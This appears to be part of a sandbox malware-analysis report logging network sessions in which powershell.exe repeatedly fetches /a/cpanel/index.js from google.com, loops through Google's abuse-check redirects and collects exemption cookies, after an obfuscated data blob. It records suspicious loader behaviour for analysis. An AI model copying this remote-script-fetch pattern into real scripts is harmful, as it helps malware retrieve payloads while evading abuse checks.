2024-12-17 07:10:35 UTC	711	IN	Data Raw: ec 6d 0a ec ec 13 13 65 9f e8 86 e8 84 ec cc ec ec ba b9 04 50 10 13 13 65 ef 6f d7 ec 98 cf 67 3f 54 00 19 ad ec 04 89 11 13 13 68 2c 99 ff 84 ec 6c ec ec 86 ec 67 ef bc 04 72 10 13 13 df 2c 65 ef b1 b3 b2 b7 2f 7c bf ba bb b9 6f 28 04 67 15 67 18 2b a8 c8 e4 13 13 13 13 df 25 65 a0 c8 e0 65 a8 c8 fc ef b8 c8 fc 65 b8 c8 f8 4d 00 19 ad ec 65 ea 07 87 67 ea 67 ec 65 a8 c8 e8 67 ea 67 b4 e4 d7 b0 c8 fc 9e be 67 2f 67 fa ef ae e0 d7 a8 c8 f8 9b a9 d7 b0 c8 e4 9f e8 65 b0 c8 e4 67 ea 67 84 e4 67 ea ef 84 e0 d7 80 c8 e0 9a e8 65 80 c8 e0 84 ec 6c ec ec 86 ec 67 ea 67 ac e4 bc 04 fa 10 13 13 69 2c 99 e6 2b e9 24 19 ad ec ed ec ec ec 67 ea 04 fd 11 13 13 67 a8 c8 e8 65 ea 54 00 19 ad ec d7 ea 99 60 df 2c 65 eb 6f 90 c8 e0 ec 98 fd 67 a8 c8 e4 65 eb 67 a8 c8 e0 Data Ascii: mePeog?Th,lgr,e/\|o(gg+%eeeMeggeggg/gegggelggi,+$ggeT`,eogeg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49774	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:34 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:10:35 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOvHhLsGIjALg1n_oD6-x5qoLjA7snmDOgpvd0YRP2UlQi1KpcsQa-jQLLaErxKo0CQKvZXI6zcyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:10:35 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:35 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49786	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:37 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOvHhLsGIjALg1n_oD6-x5qoLjA7snmDOgpvd0YRP2UlQi1KpcsQa-jQLLaErxKo0CQKvZXI6zcyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:10:38 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D088e5e5b9e5485c9:TM%3D1734419435:C%3D%3E:IP%3D8.46.123.189-:S%3DCkx4Ba_KS4Yw3puBrn2Kzg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:35+GMT Date: Tue, 17 Dec 2024 07:10:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:38 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 30 38 38 65 35 65 35 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D088e5e5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49792	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:40 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D088e5e5b9e5485c9:TM%3D1734419435:C%3D%3E:IP%3D8.46.123.189-:S%3DCkx4Ba_KS4Yw3puBrn2Kzg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:35+GMT HTTP/1.1 Host: google.com
2024-12-17 07:10:41 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:10:41 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=088e5e5b9e5485c9:TM=1734419435:C=>:IP=8.46.123.189-:S=Ckx4Ba_KS4Yw3puBrn2Kzg; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:10:35 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:41 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49802	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:43 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:10:44 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGIjArISC-HyJoTc3_sjeSAiJbpKJK0RvOcYgC0U9H7A2KwdkD7gUg85CuTxsF4j_hDoEyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:10:44 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:44 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49808	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:46 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGIjArISC-HyJoTc3_sjeSAiJbpKJK0RvOcYgC0U9H7A2KwdkD7gUg85CuTxsF4j_hDoEyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:10:47 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df40bf7fd73ae2227:TM%3D1734419444:C%3D%3E:IP%3D8.46.123.189-:S%3DeXGJVLJ07PM638YUG6OBkA%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:44+GMT Date: Tue, 17 Dec 2024 07:10:46 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:47 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 66 34 30 62 66 37 66 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df40bf7f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49816	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:49 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df40bf7fd73ae2227:TM%3D1734419444:C%3D%3E:IP%3D8.46.123.189-:S%3DeXGJVLJ07PM638YUG6OBkA%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:44+GMT HTTP/1.1 Host: google.com
2024-12-17 07:10:50 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:10:49 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=f40bf7fd73ae2227:TM=1734419444:C=>:IP=8.46.123.189-:S=eXGJVLJ07PM638YUG6OBkA; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:10:44 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:50 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49823	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:51 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:10:52 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPzHhLsGIjCsmBBC6xv-VwuUAJpX0iHVNTcTDG8MgDVGCTHNyp8cPLj69VBZYyTZcdxFDk_k1gYyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:10:52 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:52 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49832	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:54 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPzHhLsGIjCsmBBC6xv-VwuUAJpX0iHVNTcTDG8MgDVGCTHNyp8cPLj69VBZYyTZcdxFDk_k1gYyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:10:55 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd262cfe9897315fc:TM%3D1734419452:C%3D%3E:IP%3D8.46.123.189-:S%3D5LCRjAfuHX-owEVInZFwzA%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:52+GMT Date: Tue, 17 Dec 2024 07:10:55 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:55 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 64 32 36 32 63 66 65 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd262cfe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49842	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:10:57 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd262cfe9897315fc:TM%3D1734419452:C%3D%3E:IP%3D8.46.123.189-:S%3D5LCRjAfuHX-owEVInZFwzA%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:10:52+GMT HTTP/1.1 Host: google.com
2024-12-17 07:10:58 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:10:58 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=d262cfe9897315fc:TM=1734419452:C=>:IP=8.46.123.189-:S=5LCRjAfuHX-owEVInZFwzA; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:10:52 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:10:58 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49851	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:00 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:01 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GITIhLsGIjBWBBsBufMYwqtOw380evxq8HS7zh76erFkFxl8yM_dtyZPKT_qKRChp97PvQaAJ8UyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:00 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:01 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49859	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:02 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GITIhLsGIjBWBBsBufMYwqtOw380evxq8HS7zh76erFkFxl8yM_dtyZPKT_qKRChp97PvQaAJ8UyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
